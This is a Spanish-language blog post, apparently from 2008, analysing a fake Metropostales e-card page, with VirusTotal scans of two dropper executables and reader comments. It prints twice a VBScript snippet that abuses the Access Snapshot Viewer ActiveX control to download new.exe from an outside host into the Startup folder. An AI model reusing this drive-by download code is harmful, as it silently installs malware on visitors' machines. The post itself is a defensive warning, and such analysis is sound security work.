20
Ago
Metropostales Otro virus en la lista:metropostal.exe y new.exe
Me llamo mucho la atención que el enlace fuera por medio de no-ip.org, que es un dns dinámico, el cual ya he utilizado en diversas ocaciones para poder conectarme a el servidor de la antigue empresa donde trabajaba.
Revisando el código fuente de la página, me di cuenta de que los autores enlazaron las imágenes desde el sitio de metropostales.com, así se aseguran que la imagen de la página sea igual a la oficial. Sin embargo algo que no hay en la original es este script en VBScript.
<object id="SnapshotViewer1" height="5" width="5" classid="CLSID:F0E42D50-368C-11D0-AD81-00A0C90DC8D9"/>
<script language="VBScript">
<!--
SnapshotViewer1.SnapshotPath = "http://rpmsancarlos.com/h/new.exe"
SnapshotViewer1.CompressedPath = "c:/DOCUME~1/ALLUSE~1/MENINI~1/PROGRA~1/Inicio/explorer.exe"
-->
</script>
Que como pueden intenta instalar un archivo llamado new.exe en el menu inicio de todos los usuarios.
La ruta funciona, y si eres vulnerable al "Exploit Microsoft Access Snapshot Viewer ActiveX Control Vulnerability" entonces tendrás este virus sin hacer nada más que visitar la página. Claro que si usas Firefox y la extensión de NoScript, no tienes nada de que preocuparte, ya que normalmente esos dominios no tienen autorización para ejecutar scripts.
Como es mi costumbre me baje los dos archivitos, tanto metropostal.exe y new.exe, los cuales analice en _Virus total y aquí están los resultados.
Metropostal.exe fue creado apenas ayer, así que esta relativamente nuevo, no obstante esta marcado como peligros por 12 antivirus. Algo a notar es que esta escrito en VB6.
New.exe esta comprimido don UPX, y lo cual lo hace peligroso por definición, ya que recordemos que los ejecutables normales no suelen estar comprimidos ni encriptadas.
Debido a que ya no puedo tener instalada la maquina virtual, no puedo ver que hacen estos dos malandros cibernéticos, pero juzgando por el tamaño, me imagino que son solo droppers, es decir que lo que hacen es que una vez que se ejecutan, traen más amiguitos a sus fiesta privada que esta en tu computadora, posiblemente roben tus contraseñas y envíen spam, claro también van a seguir distribuyéndose a más incautos.
Saludos
<object id="SnapshotViewer1" height="5" width="5" classid="CLSID:F0E42D50-368C-11D0-AD81-00A0C90DC8D9"/>
<script language="VBScript">
<!--
SnapshotViewer1.SnapshotPath = "http://rpmsancarlos.com/h/new.exe"
SnapshotViewer1.CompressedPath = "c:/DOCUME~1/ALLUSE~1/MENINI~1/PROGRA~1/Inicio/explorer.exe"
-->
</script>
Que como pueden intenta instalar un archivo llamado new.exe en el menu inicio de todos los usuarios.
La ruta funciona, y si eres vulnerable al "Exploit Microsoft Access Snapshot Viewer ActiveX Control Vulnerability" entonces tendrás este virus sin hacer nada más que visitar la página. Claro que si usas Firefox y la extensión de NoScript, no tienes nada de que preocuparte, ya que normalmente esos dominios no tienen autorización para ejecutar scripts.
Como es mi costumbre me baje los dos archivitos, tanto metropostal.exe y new.exe, los cuales analice en _Virus total y aquí están los resultados.
Metropostal.exe fue creado apenas ayer, así que esta relativamente nuevo, no obstante esta marcado como peligros por 12 antivirus. Algo a notar es que esta escrito en VB6.
| File metropostal.exe received on 08.20.2008 04:04:46 (CET) | |||
| Antivirus | Version | Last Update | Result |
| AhnLab-V3 | 2008.8.19.0 | 2008.08.19 | - |
| AntiVir | 7.8.1.23 | 2008.08.19 | TR/Crypt.XPACK.Gen |
| Authentium | 5.1.0.4 | 2008.08.20 | - |
| Avast | 4.8.1195.0 | 2008.08.19 | Win32:Trojan-gen {Other} |
| AVG | 8.0.0.161 | 2008.08.20 | - |
| BitDefender | 7.2 | 2008.08.20 | - |
| CAT-QuickHeal | 9.50 | 2008.08.19 | (Suspicious) - DNAScan |
| ClamAV | 0.93.1 | 2008.08.19 | Trojan.Dropper-4959 |
| DrWeb | 4.44.0.09170 | 2008.08.19 | - |
| eSafe | 7.0.17.0 | 2008.08.19 | - |
| eTrust-Vet | 31.6.6036 | 2008.08.19 | - |
| Ewido | 4.0 | 2008.08.19 | Dropper.VB.ud |
| F-Prot | 4.4.4.56 | 2008.08.19 | - |
| F-Secure | 7.60.13501.0 | 2008.08.19 | - |
| Fortinet | 3.14.0.0 | 2008.08.19 | - |
| GData | 2.0.7306.1023 | 2008.08.20 | Win32:Trojan-gen |
| Ikarus | T3.1.1.34.0 | 2008.08.20 | MemScanTrojan.Dropper.VB.AAM |
| K7AntiVirus | 7.10.421 | 2008.08.19 | - |
| Kaspersky | 7.0.0.125 | 2008.08.20 | - |
| McAfee | 5364 | 2008.08.19 | - |
| Microsoft | 1.3807 | 2008.08.20 | TrojanDropper:Win32/VB.DP |
| NOD32v2 | 3369 | 2008.08.19 | - |
| Norman | 5.80.02 | 2008.08.19 | - |
| Panda | 9.0.0.4 | 2008.08.19 | Suspicious file |
| PCTools | 4.4.2.0 | 2008.08.19 | - |
| Prevx1 | V2 | 2008.08.20 | - |
| Rising | 20.58.12.00 | 2008.08.19 | - |
| Sophos | 4.32.0 | 2008.08.20 | Mal/Dropper-AG |
| Sunbelt | 3.1.1546.1 | 2008.08.15 | - |
| Symantec | 10 | 2008.08.20 | - |
| TheHacker | 6.3.0.5.054 | 2008.08.19 | - |
| TrendMicro | 8.700.0.1004 | 2008.08.19 | PAK_Generic.001 |
| VBA32 | 3.12.8.3 | 2008.08.19 | - |
| ViRobot | 2008.8.19.1341 | 2008.08.20 | - |
| VirusBuster | 4.5.11.0 | 2008.08.19 | - |
| Webwasher-Gateway | 6.6.2 | 2008.08.19 | Trojan.Crypt.XPACK.Gen |
| Additional information | |||
| Tamano archivo: 62530 bytes | |||
| MD5...: 4854a89f5212fce44281102e719450ff | |||
| SHA1..: 130bd263e051675d24e334e4d36c6bdb89cfce69 | |||
| SHA256: ebea513cce2c637a12737b9bae6ac0d229c9d034817031667911095a563cd908 | |||
| SHA512: 15d1a2854adeb27304c95d4f643372083ef0a45e0018222af2d5563ffc0217b1 5304abc2413c413a85cb461b1e2109fe2f81b3bb7b34082e8e7a7d38cc0634ce | |||
| PEiD..: - | |||
| PEInfo: PE Structure information ( base data ) entrypointaddress.: 0x401c99 timedatestamp.....: 0x46c84758 (Sun Aug 19 13:36:24 2007) machinetype.......: 0x14c (I386) ( 4 sections ) name viradd virsiz rawdsiz ntrpy md5 .text 0x1000 0x3c98 0x4000 5.54 50a17654766e64f8a48bc5f736f15060 .data 0x5000 0xab4 0x1000 0.00 620f0b67a91f7f74151bc5be745b7110 .rsrc 0x6000 0x10 0x1000 0.01 a85d039edc3540b108709278812b252a .1data 0x7000 0x5000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e ( 1 imports ) > MSVBVM60.DLL: EVENT_SINK_GetIDsOfNames, _CIcos, _adj_fptan, __vbaVarMove, -, __vbaAryMove, __vbaFreeVar, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, __vbaPut3, _adj_fdiv_m64, EVENT_SINK_Invoke, __vbaRaiseEvent, __vbaFreeObjList, _adj_fprem1, __vbaI2Abs, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, -, __vbaAryVar, Zombie_GetTypeInfo, __vbaAryDestruct, __vbaExitProc, __vbaOnError, __vbaObjSet, -, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, -, _CIsin, __vbaErase, -, -, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaGet3, __vbaPutOwner3, __vbaI2I4, __vbaLbound, __vbaRedimPreserve, _adj_fpatan, Zombie_GetTypeInfoCount, __vbaRedim, EVENT_SINK_Release, __vbaNew, -, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, -, _adj_fprem, _adj_fdivr_m64, -, __vbaFPException, -, __vbaGetOwner3, __vbaStrVarVal, __vbaUbound, __vbaVarCat, _CIlog, __vbaErrorOverflow, __vbaFileOpen, -, __vbaVar2Vec, __vbaNew2, -, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, -, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, -, -, __vbaVarDup, -, __vbaVarCopy, _CIatan, __vbaStrMove, __vbaAryCopy, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr ( 0 exports ) | |||
New.exe esta comprimido don UPX, y lo cual lo hace peligroso por definición, ya que recordemos que los ejecutables normales no suelen estar comprimidos ni encriptadas.
| Análisis del archivo new.exe recibido el 20.08.2008 17:38:16 (CET) | |||
| Motor antivirus | Versión | Última actualización | Resultado |
| AhnLab-V3 | 2008.8.19.0 | 2008.08.20 | Win32/NSAnti.suspicious |
| AntiVir | 7.8.1.23 | 2008.08.20 | TR/Crypt.ULPM.Gen |
| Authentium | 5.1.0.4 | 2008.08.20 | - |
| Avast | 4.8.1195.0 | 2008.08.20 | - |
| AVG | 8.0.0.161 | 2008.08.20 | - |
| BitDefender | 7.2 | 2008.08.20 | GenPack:Trojan.Dropper.Delf.BBM |
| CAT-QuickHeal | 9.50 | 2008.08.20 | - |
| ClamAV | 0.93.1 | 2008.08.19 | - |
| DrWeb | 4.44.0.09170 | 2008.08.20 | - |
| eSafe | 7.0.17.0 | 2008.08.20 | Suspicious File |
| eTrust-Vet | 31.6.6037 | 2008.08.20 | - |
| Ewido | 4.0 | 2008.08.20 | - |
| F-Prot | 4.4.4.56 | 2008.08.19 | - |
| Fortinet | 3.14.0.0 | 2008.08.20 | - |
| GData | 2.0.7306.1023 | 2008.08.20 | Trojan.Win32.Buzus.rfg |
| Ikarus | T3.1.1.34.0 | 2008.08.20 | - |
| K7AntiVirus | 7.10.421 | 2008.08.19 | - |
| Kaspersky | 7.0.0.125 | 2008.08.20 | Trojan.Win32.Buzus.rfg |
| McAfee | 5364 | 2008.08.19 | New Malware.bl |
| Microsoft | 1.3807 | 2008.08.20 | Trojan:Win32/Buzus.A |
| NOD32v2 | 3371 | 2008.08.20 | - |
| Norman | 5.80.02 | 2008.08.20 | - |
| Panda | 9.0.0.4 | 2008.08.19 | - |
| PCTools | 4.4.2.0 | 2008.08.20 | - |
| Prevx1 | V2 | 2008.08.20 | - |
| Rising | 20.58.22.00 | 2008.08.20 | - |
| Sophos | 4.32.0 | 2008.08.20 | Mal/HckPk-A |
| Sunbelt | 3.1.1564.1 | 2008.08.20 | - |
| Symantec | 10 | 2008.08.20 | SecurityRisk.Downldr |
| TheHacker | 6.3.0.5.054 | 2008.08.19 | - |
| TrendMicro | 8.700.0.1004 | 2008.08.20 | TROJ_BUZUS.QA |
| VBA32 | 3.12.8.3 | 2008.08.20 | Trojan.Win32.Buzus.qdk |
| ViRobot | 2008.8.20.1342 | 2008.08.20 | - |
| VirusBuster | 4.5.11.0 | 2008.08.20 | - |
| Webwasher-Gateway | 6.6.2 | 2008.08.20 | Trojan.Crypt.ULPM.Gen |
| Información adicional | |||
| Tamano archivo: 57856 bytes | |||
| MD5...: 90a2d4c87a77eea0302e0335f16f2e09 | |||
| SHA1..: 05bfff7ef4aff3b544cbe47e6ab8f1a3681920cb | |||
| SHA256: a835dc928d129d2d6e5ec4b57392f263be5c3b08c2c216f12aaee4e5d199d681 | |||
| SHA512: 7bf4e42305642e618c7b828f7e2d161a035f208c45db9c75e85b14cd73027486 2465e8b0f55a79888a801043aab0023c38f906ea6692aa4e05124f26de108227 | |||
| PEiD..: - | |||
| PEInfo: PE Structure information ( base data ) entrypointaddress.: 0x418730 timedatestamp.....: 0x2a425e19 (Fri Jun 19 22:22:17 1992) machinetype.......: 0x14c (I386) ( 3 sections ) name viradd virsiz rawdsiz ntrpy md5 UPX0 0x1000 0xa000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e UPX1 0xb000 0xe000 0xda00 7.99 223288db979476f48f5b84e35693af92 .rsrc 0x19000 0x1000 0x400 2.83 62b3229e36fd278c875a996ba54a4cf8 ( 6 imports ) > KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess > advapi32.dll: RegCloseKey > ntdll.dll: NtUnmapViewOfSection > oleaut32.dll: SysFreeString > user32.dll: MessageBoxA > winmm.dll: timeGetTime ( 0 exports ) | |||
Debido a que ya no puedo tener instalada la maquina virtual, no puedo ver que hacen estos dos malandros cibernéticos, pero juzgando por el tamaño, me imagino que son solo droppers, es decir que lo que hacen es que una vez que se ejecutan, traen más amiguitos a sus fiesta privada que esta en tu computadora, posiblemente roben tus contraseñas y envíen spam, claro también van a seguir distribuyéndose a más incautos.
Saludos
Anónimo dijo:
hola, pues a mi si me llego una postal que me parecio extraño que me la mandaran, como se si me robaron la contraseña?????ayuda xfa
Hola anonimo, lo unico que necesitas hacer es cambiar tu contraseña, y asi no importa si la tienen o no.
Saludos
anonimo2 dijo:
Saludos. cómo se si ya no tengeo le virus
?
julio dijo:
jajaja lo bueno que uno aveces se pone buzo en esto por que sino ps ya nos cargo la chin..... jajajaja bueno ps gracias por la info bro por que cuando recibi la dichosa postal no se me iso raro por que aveses las chiks son asi de empalagosas vea pero desde que recivi un virus parecido donde dice que chekes tu foto y te dan un link ps ya me pongo a indagar para ver sus codigos o ver si la pag deverd JAJAJAJAJA PINCH....SSS VIRUS OGTS JAJAJAJA
SALE PUES CUIDENCE....